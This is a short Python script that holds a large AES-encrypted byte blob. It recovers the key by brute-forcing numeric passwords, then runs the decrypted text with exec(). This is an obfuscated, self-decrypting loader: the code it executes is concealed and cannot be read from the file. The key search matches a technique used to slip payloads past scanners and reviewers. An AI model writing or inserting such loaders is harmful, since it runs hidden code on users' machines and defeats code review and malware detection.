from Crypto import Random
from Crypto.Cipher import AES
import hashlib

class Decryptor:
	def __init__(self, key, file_name):
		self.key = hashlib.sha256(key.encode('utf-8')).digest()
		self.file_name = file_name

	def pad(self, s):
		return s + b"\0" * (AES.block_size - len(s) % AES.block_size)

	def decrypt(self, ciphertext, key):
		iv = ciphertext[:AES.block_size]
		cipher = AES.new(key, AES.MODE_CBC, iv)
		plaintext = cipher.decrypt(ciphertext[AES.block_size:])
		return plaintext.rstrip(b"\0")

	def decrypt_file(self):
		dec = self.decrypt(self.file_name, self.key)
		return dec

class BruteForce:
	def __init__(self, encrypted_codes):
		self.encrypted_codes = encrypted_codes
		self.password = 0

	def start(self): 
		status = True
		while status:
			try:
				test = Decryptor(str(self.password), self.encrypted_codes)
				decrypted_code = test.decrypt_file()
				executable = decrypted_code.decode() 
				status = False
				return executable 
			except UnicodeDecodeError:
				self.password += 1

encrypted_codes = b'\x9e "x\x9c\xb1"\xca^\xcbD\xe0\x1c=\xe7\x86\xe8\rh\xcch\xa3j\xb4a\x91)n\x03\x8c\xd7\xfd\xa2\xc36\xa7H{s\xe7\xe2v\xdd\x93dp\xb5\x15\x15\xb2\x80\xc27m\x1aM\x80N\xe7e\x93\xe9\x11"\xf1W\x03\x9ci\x904\xe4>\x7f\xd5\xed\nG\x99=\xd1O\xe7\x17\x0e\x12\x03\xd8h]]-\x04u\x92]6/\xfc\x14\x80\x83\x17\x96\rQrN\xd6\xba\xce\\\xbf,\x8ad\xceM(\xb7\x0c?(\x1f\xe56\x83MA\x00\x1a\xeb=G\xf0W\x11\xe6L\xb5\n\x81\xaa)/\r\xb6\x92(\xfbaPY\x0c}\x7f%\xacP\xdd\xa9\xdb\xd2\x1a\xd5J\xc5\xcb\x88\xbc\x01Mx\x16\x0b\x03o\xfdo\x81\x8ek\xcb\x85qif\x83\xcd<R\xe9\xfd\xf6k\xa3K,D\xbd6\x99"J\x01+\x10\xea\x17\xb306m\x94r-\x93\xb0E\xe04\xdd\xb7H\x93q\xdb\x02\xab\xa0B*\xc6\x8e+\xf3\x91\xc1{t\x870\x17v\x8b\xa8F\x082S\x9f\xc0\x85\xdc\x13/VxB\x9b\xa2\x06B`,hb\xce\x1f(X\xbb.0%\xe3/\xa2\xdf\xeb,\xa81#\x0e\xab\xc9\xe8W}\tx;\xb0S\x04:8\xfc\xd1\x05\x12\xcaL<\xe5\xfa\xe6\xc5\xd0\x0c<\xb3\xf2\x9c\xb8\xa8\xb2\xcb\xbc|>1\xbd\x10 \xb6o\x0cVw\xa1\xb3\'\x97w\xe10\xd4@\xfd\x1aP\x9e\x15\xbf;s\x9a\x93\xcd&0ix7\xf3|\xf8z8\xc7u4\xd7A\xf4sS\xbb+\xd8b:J\xaf\x8a\xf8\xe5\x8a\xd1\x84Y\xc1\x01\xfc?9\xa26S\xf1^d\x92\x9b\x05\'\x8a\xa5\xdb\x7f\xb2\xb6\x80C\xf6\xbfc\xbcvD2\x9d\xec\xc5\xe3\xe3e\x9f\xf0 \xf4,?\xc4hL\xb5\r_\xe6w\x80\xb3.\xcf&\xa22(\xb0?\x98\xd0\xed\x85\x9eH\x9c\xd7\xfb\xbc\xd7 \xe1\xd9\xc8<\x91\xd0nG\xe5\xa2\x00\xcd\xa2k"p\xcbpLV\x1bAi\xd7\xf1\xe3b\xa0\xac\xe0\xf7v\xdeVY<O\xb5\xff\x8c2\x07\x02\xe0}\x95\xd1\xd1\xe4x\xfc".\x86s\xc9\xe4\xd5x\x14\x13w\xb0\xde\xdd\xa6\xb6\x98K\xae\x00\xd5\x82~\xbd~\xd6\xcb\xf2\xf2+\x8f\xdfq\x85\xe9o\xe5\x86\n\x9b\x1f\xa7P\xf8\x0b\x13\x94\xfa\xc7\x959\x1d\xf7\x9bg=\xe2M2\x8f\xef\xe5\xc0\x93\x97-\xc5\xa6p\x8bu\x0c\x96\x8dx`\x7f\xcd!\x9fn5Pj/\xdd\x8f\xde7\xacJ\xccp\xc0g\x90\xa9\x02z|\xb2{m\x1e,\xe7g0\r\xa3\xcb\x12\x8c\x9b\x94U\xee3\x98L:\xc3\xc3\xebyn3W75-C\x8c\x81)\xf8-sW\xb8\x83n\x03N\x1cO\x15\xf2\x05\xd0\xf3\xf3&s\x9b\x82f1\x9ftzrPiTk\xc6\xfd\x1fj\xfbe\\\xc5\xa7\x7f5\xc1\xee\x9f\x17\xa5\x89(\x7f%\xc3\x94\x12$Q\xafr%GA\x8a\xdd\xd2\x83\xb0\x0f\xd1gw\xea\xe5\xcc\x89/\xbe\x0fQD\xe4\xdb\xba\xf5\xc17\xa6\x9dQcO8\x87H\xbd$a\xa7\xa8\x83\x1b\x04\xf0z*3\xa2\xf3\x1e"\xb7\x13\xbe\xc9)\x05mE\x86b\xc4\xa6vdbk\xfe+\x18y>\xe7\xbe*5\x81l\xa5\x81x+\x92Z]\xb5\xd9\xbf\x16\xfe\xf8U\xdd\xbe\t\x98\xe3\x87w\x9f\xea\x07\x9e\xfe\xb3\xbf\x95\xa7\'\xf1\xda\xfb\xd4\x0frJRD\xe8\xad\xcd\xc5_\x95\xe4\xbe\xb2\x04\x8e:F\xe6\x8b\x0c\x19O\x9d_r#\xf3}\xc9\xfc0&Y\x84/\xc1\xac\xf3\xda\xb3\xfe\xb4\xf2\x8enc\x94\xd7\x8a\xabM|\xa3\xb5\xfb\x99\'\xe4\xdd\xf3\x11;|$J\xedT\xa5\xf6r\x91\x9c\x81q:~\x9ami9H\xa9\x102\x9e\xcc\xe2\xbdm\x15cz\xa8\xd4p\xe7\xf4\xa3M\xa9\x08\xc8\x13\xe7\xba~h,\xe4c?\xda\xc4\x1f\xfd\xbf\x90\xb3\xde\x1c\xfe\x80\r\xac\xef;L\xff\xc4\xb3eE\xc6\xfc\x92\xbf\xac7\xf5\xb3\xcb\x82F\xa5\xf1l\xa3\xb9\xab\\M}\xac\xc8> \xe59\x06\xca\x05\xc58}\\@\xaf@s\xc2 \xc6\xd6\x88\xfe)\xd9\xdf\xb3p\xda\x807\x81\xaaRm\x8b*3n\xf6\xb9\xb1\x1bwH\x13\x1f\xfa\xf4hi\xf1\x96[\x84I\xecPi\xf6?\xd3\xf9\x9a\xb0\x10\x83L\x19\xd0d\xe6\xec\x10\xf8\xf0\xa9\x17|\xd2\xfb\xdd^\xad~\xe4\x96n\xbe&2W\n0"\xd6\xdf(\x88\xbdo\x01*\xcd\xd2E \xae\x1b\x80\x1c1\x92\x01\x9by\x85\xce\xc0B\x81W\x87jF\xf8\xdek\xfa8{\xf5\xcc\xd9\xa9\xf9\x90m3\x7f\xf4\xdaM\xdc\x96\xb2Z!\xa3\x841\xfc\x16O\n*\x99\xd7\xe9o\x90\xbe\xe0\xf4)\xc9\x16\x8d\xf9\x96r\xb9\x9a\x0cn_{\xd1\xfd\xbb\xbf\xd5\xca\x92\xce^8\xc7\xde\xa5U\r\x91X>7\xb9\x07\xc1g\xd1\xc9\xff\xab5\xbe\xf1^\xcb\x86\x06\x81\xfaL\x91\xf7\x11\xe88H\x87\xec\xb2\xc0\xdb3\xb6\x16\xfdp\xec\x9d\x9eO\xf0.\x19\xdb\xa2\xbf\xf5E\xfao\xa3\xa2\x8b\x7f\x1b\xceNW\x04\xb1\xbd\x18\xfd\x0c\xe3\xd6~\x0bLmB\xfc\x86\xad\xbd\xb6\'\xf8\xb9\x8d\x16NL\x94CW\xbd\xb3I\xd0\xb5q\xf2;\xfa\x8c\x9a&u\xb7x\x1f\x1c\x18?\xec\xe1\x88\x9f[\x8c\x0b\xbc~\xa6\x9bLv\xb0=\xe7\xd7p?@\xd7D\x93\xee\x8f\x9b\x1c\x89\x90.\x88\x90\xba\xceI\xf3_\x14\xa2\xb5D\xc2\xda\xf4y\x98*\x9b\x88\x08u\x10(|\xe7\xb2\x00y\xe96/h\xa1y\x1bz<Hk,\t\xcau\xb6\xf2\xc6\x06}N\xd9\xd7\x86-\xeb\xad\xe7\xed\x83\x10$ \xa29%1k\x91\xe4\xbf0?\xdf-)s\xf5c\xa6\xda\xc2BW#\xcb\xb7\xb2\x1b&`\x8d&o5\x00T\\B8-\xe7\xd6\xc6\x05QG:\x98\xf3\x8dh\xbb-P;\x98\x01\x10\xe9\xd6J\x82\xb93\xc5v\x0c\xb98\xe6\x17\xcdq\xe4K\x18OI\xab\xfc\x1d\r\xb8\xd7s\xdd\xd6\x95-\xdc\xaah\xd2E\x92R\xe2\xfe\xa5f\xad>g\xcc\xb8\x9c\x8f\x8e7Q\xb6:\xc9p\\\xedQ\x8f |\xe5@\xca\x19V\xde\x8c\xc5<\xf7\xd6\xf2\xbc\x03nh\x01\x10\x8bGk\xad\xb4\xd9\xb6$0\xfe\x8c\xac\xdc\xc5?> \x1az\x85\x91\x97g\x1e\x84\xbf\n\xc2\xa0\xb6\xd1\xb2\x00_d\xc5x\xe2\xcea\xab{\xe1\xccp\x8d\xadZq\x14h\xee%\xe7\xce\x8e\x1b\x0bt\x91\x84\x05Y$4\x9fX`\x928AY\x9d\xbc\xca\x95\xc2\x92R\xda\xb6%6y\x16pk\xb7f\xd6[\xc8\x81\xb4T\x17\x8bKY\x90\x88p\xa4\x90e\xaa!\xc4\xb7\xfb3o\x88O\x88\x87|\xa9\r\xe1\x02\xab\xb2\xfae\x8b\xac\xa9c\xa5\xbaY\xed\xaf\x80<\xe364\xdb\xf2\x99\xd8\xfc\xe1\xad\xbb4\xb7~u\xe6\xbd\xea=\xc7\x16\x11\xff6$P=b\xe3\x8c\x8a\t?6\x03\xf7X\x94\xe3\xa6J\xe1\x91\\u+\x7fGS\xdc7_\xca\xe7iw\x9f\xfe#Ki\xb9\xb1\xaado1:\x97\n\xadN0\xaa\xac\xa9\xc1%^{\xac\x8d\x98.;\x1bK\x04C\xba\x07a\x16?\xdc}g\xb5\x93\x07\x87\n\xcc\x86t\x98\x93aB\xee\x7fx\xdaK!\xca}\xcd\x9d\xac%\xcf\xec%`GcV\x16\xf6\xa0\xa0~\xce\xfe\x83\xb7\xc5\xf6\xdd\xafk$:8\x1b\xb0t\xd2EYB\x98*/\x8a\x1a\x187\xb2\xdfM\xeb\xc8u\x1b\xc4\xb8\xdd\xe2\xab\x92D\x1a\xba\xa4\x0fYv\x1d\x18\xc3\xc8\n\x1bA\xba\\0\xfe\xea\x08\xcf\xb9C\xd7\xe5\xab\xdf\x8dV\x1d\x8f\xc1\xdf\xdc\xfd\xc0\x0eD\'#\'\xdb8\xe94\xfb6\xafH\xa5-\xb2\x8a?\x1ev\x85\xc7\xe5>^\xf2\x04d\xebx\xc4OH\x05"\nP}\xffb<\x84g\xef\xca\xca\xf4\x96\x08N\xe0\xfb\xea\xc5\xfa\xb1J\x9f\xde\x9e\x05d$h\x1d\x84\xe5\xca\x9d\xec*~K"u\xa1\x1a\xe5*\\\xe1\x90\xb3\x1b\x8c\xb2\xd4\x9fa\x981\x0e\x0f\x95;\xff\x0e*e!\xff\xbd\xec$4\x924LN\xb0\xf5\xc6\xf8\x9f\xe6\x03~0\xf6\xf9\x94\xb3YQ\xfa\x01\xafS\x16\xd2\x1dyk}\x97w\xcc\n\xd1\xa8\xc2\xf5\x8f\xad\x19}\xa2\x0c\t\x1ew\x07\xd5Z.\xdf~\xdf\x9a\x05\x08\x1c\xcc\x04\xe8\x93\xd1#\xb4\x03\xc7\xa4q\xdbqm\x0e\x9d\xa9T\x013\xe1\xddjC\x8e\x9a8=\xf9\xab\x06\xa3\x94\xb5V]B2\xadQ\x16lh0\xa4\x87\xd8\xb1\r\xbbH\xd7\x9e+\x15\xc3\x86\xb5DX\xf1X\xa8\xd6\x90\xbe\x8ex\xb1\xf2\xb2W\x10K\x1a\x9af\xba+\x93/\xde\xbfk\xcbi\x83*\x08\xe1y\x11\x16$\x00`$rha[\x00om\xa0\xbbl_\xd1}\xff\x00\x9b\x9f+j\xa7\xd6\x8a\x1e.\xba\xc3\xa3g\xc9\xa3\xd6\xe3\x83\xf5\xe4o\xa2h\x86dm.\x1e\x0c\xa2\xfd\xa5F\x80\xd4W\xe4\x07@\x14\xbf\xaa\xd6Vd\xa1\\W\xae\x0c3)B\xd3j\x91@b!\x04/\xe8\xc8\xd7\xe6\xb7\xed\xa3\xff\xa7\x17\xc7\x16\xb9\x99Jm\xf7\xcfn\x1ao\xb3\x0b/eO \xf5\xc0\xf7\xe8RW\x02\x8as< \'\x8ddm\x84W\x9fZ\xac\x91\x18\xc7\xb9\xc2\x1c\xd8\xedHa\x8b\xa74,4\xfd;\xb7\x0c\xefL\x9e\x95\x85\x18\xe7\xad\xce;\xd2\rsM\x19\xd55\xcdB\xben\x99M\x12\xcc|+\xcdV\xb7oh>R\x13c\xc7\xd5\x8e9\x88t\xde\x18\xd3Q\xb8S\xe3[\xf0\xb5\xa3\xfbN\x85\xbb7^\xb2\xb2\xe7\x9f\xba\x13F]\x1b\xb8(\x83\xa7H=O\xd3\x96AJ\xa98\xa8\x0e:6\xc4\x9e)\x18\xe5\x88 \xfb\x055:H\\\xfd]\xc7@\x13\x13\xd31\x12[\x8az\xba\xa0!R>>P\x19\x87\x04\xcaq\x02C\xb9~\x91`\x9c\xca\xa2\x83\xfb\xa3\xa5\x805\x93Z\x13\x01y,\xc3\xf4\xe0\x03\x16\xff\xf9\xf6\xc7\x05\x15\xb5\xfd\xf3h\xc6W\xad\xc0\xdd\x8e\xed\x8c\x0c\xae\xcd\x18=\xba\xb8\xfe\xf8\nf\xad\xde\x1f%\xe1\xad\x18T\xbe\x9f\xa0I\x84&P;0\xf9 ;\xce\x1e\xd8\xa0-\x1f\x85\x18\x01g\rI\xff\xccc=\x94\xe6\xbc\xda\x89z\xce\x85+\x86\xa2O\xe2l\xc9\xfe\x97*$v\xb2_N\x9f\xb5\xfd<\x89ez"P\xf1l\xea\xc8\xd26\xd6\xfc\x85\xcd\x92K\xf1\x19\x95\x0b\xcfd_`-t\x9a\x88\xa5\x8f|7\xccRf\x7f~x\xc1J9\x85;%I>\xd6\xe2 v\xd3\xd4-\xcd\x9f\x92\x06 \xbc\xb0\xb2\xce\x96)\xdd!tFh\xdd\xbb\xc2U\t5\xaecr\xdb\x92 \xbe\xecp\x86\xe7y\xc8f\x80U\xf5\xcb\x1aE\xfe\x1d\xfb\xd7\xbb]\x0e\xdd8k\xe3\xe2\xd8\xd9n*\x0e\x92\x88\xe6\x0b\xcf\xa0\xae\xc7\x81\x88)\x12X>u\'\xc2faA\xd7\x03\xf8\x0f2\xff\xf6\x05q\x11K\xbc\xaa\x01\xe7K\x12\x16\xef\x7f\xe1Z\xdc 5\xd7\x95\xdf\xc5\xe1\\\x98\xa2\xb5?\xda\xe0\xe2?\xa2\x10%\xff\xc0^!\x82,\x90\xbfy\xf6\xddQf\xeb\x19\xbb\xb5\xa2p\xc5\xb8\x8c\x0b9I\xcd\x928\xa5\x15\xcbyG\x10\x81\xc9\xf4 \x0c\xbf\xf8v\x96\x83\xf3C\xe3*\x1a\xf2\x8d\xfc\xa6\xf6\xa0\x1f7Q\x8e\xda:[\xca\xec~\xd5\n+\xc0\xc9\x93\xdfas\x0c\xb8\xc3\x04\xc3\x15\x8b\xe5\xc8zy\xa6\xff\xcfn\x93\xcf\xb0W\xdfY#\x1c\xd8\x14\xc5\x10\xbed\xa6\xd6M\xfe\xae\xbeH\xd0\x17\x86e\x81\xf3\xbc=i:T\xe6\xc9g\xca\xf6\xc7P\xb0\r\xea\xc7\xa7\x12\x9bc;\x06\x9a]\xe90id\xbb\x1f\xfa{\xd1\xed\x1e\xbek\xef\x8e\x90\xe0\xea\xb4\x83\xca\xfd?\xe5`z\xf5X|\x18@\x86"\x99\x067\xa9\x12A\xc6\xcaO\xcb\xad\x87B>ZB\x83\xdc\x8e:-\xae\xd5\xb1\xe11\x0c\xf6Y&h\x0c\x85\xfd\xc0L\x1d\xda\xb5\xe7\xd5\xb7\x0e6)\x15[n_\x01\x1c\xc0\xf2\x12\x8f\xf3\xa2\xfaq\xd9\xd4CR\xf9\x96\xd6\x19\xa5{\x15}fLq\xf6\xd5\xc6\x1d\xecW,w\x03\xe8rM\xc9\x7fW=\x9c;\xf2\x0f\x9b1R\x06\xb3K\xdb\xfe#j\xa1s]$\xf6\xcc\xf5\xef^Y~[\x83J\xe4\xc1M{\xac\xa4\xb2\xbc\xfdu\x0b\x98s\x00/J\x83\xe7\xa5\xa9=\xcc"U]L\xf3\xc4>\x1b\xf6\x19\x10U\x95\xa4\xd5O\xce)v\xad\xf4\xb6\xc9\xbc\xc1\xd0\xacV\x9d\xb6~%\xd8\xff\xc0\xd0Y\x0b\xe5\x01\x0b\x92\x11\xaa\x8b\xcfe\xe0\xaa\xe2\xa1\xe5\xa0\xaau#\xe9#\xb9\'P\xf49t\xf8\x88]\xc3\xe3Q\xf4\x83\xddQ/D\xba\x02\xab\x85\x10\xb6\x87\xa7+\x81\x0e\x049\xea\xba\xd7\x8a\x88Q\xa33\x80@O\x97\xc35q\x7f\x9b\xa5u\x93os\xf5\xbe\x8c \xe1\x08R\x82\xa8\x9c{y\x0bA\xbe\'ACA\xa19\xd0$\xc6\xae\xd8\x91\x95\x8c\xdf\x82\xd3\x04\xd2\xce\xba\xb2\xa8\xe3*0\xf0\xbf\xf0\xe0\xc1\xafes\xb2z\xf5[S\xdd4f\x8d\xe2\xe9Sk\xc8e^n\xc7\x12\xd4\x8a\x15\n\x88g\xf5l\xb4\x8f\xcd\xae\x05\x83+\t\x87\x86\x93\xfb\xdd%\xd8\xbe\x0b\x16\xeb\xdfH\x12\x91/+~\x14+ BW\x82].$\xf9\xa7\x83\x1fUk\x07\x17L\xf2oW\x10\xe6\xb4>raY\x84\x11\xb3@\xda\xdb\xbd\x1eH[\x1c{\xfe\xc1\xf1\xa0\x0b\x97\\\x1d\xe9\x1e\x97>N\xc4eZX\x880\xf5\xa6J-0\x1a\xb5 \r\x88\xd8\x88{>\x86\x97\xb2\xf1T\xafUN\xaf\x80f\xf2\xe2\xe9u.y\x99\xa0L\xbe\x8a\xaf\xc0\t\x7f\x84\x80\xb1\xca\x84\xf8$\xf8\xf6\xb5&!\x1cG\x18W\xb1\xd3\x9d\xbe\x8e\xd5\xb4$"(\'\xaau]E\x85/,\x9b<\xaa\xe4t\xe1\xaf\x88\x96\xe06\xef\x071\xa9n\xf4\xcb\xe1\xbf\xe0\x0e\xea|\xd6\x8cM\xb0\xbb\xee|\xee\x03\xdc'
brute = BruteForce(encrypted_codes)
executable = brute.start()
exec(executable)
